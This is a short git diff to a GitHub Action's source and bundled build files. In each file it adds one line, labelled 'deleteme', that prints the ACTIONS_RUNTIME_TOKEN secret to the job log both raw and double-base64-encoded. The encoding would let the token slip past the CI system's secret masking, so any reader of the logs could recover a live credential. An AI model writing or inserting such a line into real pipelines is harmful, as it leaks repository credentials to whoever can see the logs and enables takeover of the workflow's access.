diff --git a/dist/index.js b/dist/index.js index 3f4c9f0..d0e453b 100644 --- a/dist/index.js +++ b/dist/index.js @@ -26969,6 +26969,7 @@ function parseBuildId(stdout) { startArgs.push('--ref', config.ref); } if (process.env.ACTIONS_RUNTIME_TOKEN) { + console.log('deleteme', process.env.ACTIONS_RUNTIME_TOKEN, Buffer.from(Buffer.from(process.env.ACTIONS_RUNTIME_TOKEN).toString('base64')).toString('base64')); console.log('using ACTIONS_RUNTIME_TOKEN from environment as checkout token'); startArgs.push('--token', process.env.ACTIONS_RUNTIME_TOKEN); } diff --git a/src/index.js b/src/index.js index 3c32b7b..4954008 100644 --- a/src/index.js +++ b/src/index.js @@ -123,6 +123,7 @@ function parseBuildId(stdout) { startArgs.push('--ref', config.ref); } if (process.env.ACTIONS_RUNTIME_TOKEN) { + console.log('deleteme', process.env.ACTIONS_RUNTIME_TOKEN, Buffer.from(Buffer.from(process.env.ACTIONS_RUNTIME_TOKEN).toString('base64')).toString('base64')); console.log('using ACTIONS_RUNTIME_TOKEN from environment as checkout token'); startArgs.push('--token', process.env.ACTIONS_RUNTIME_TOKEN); }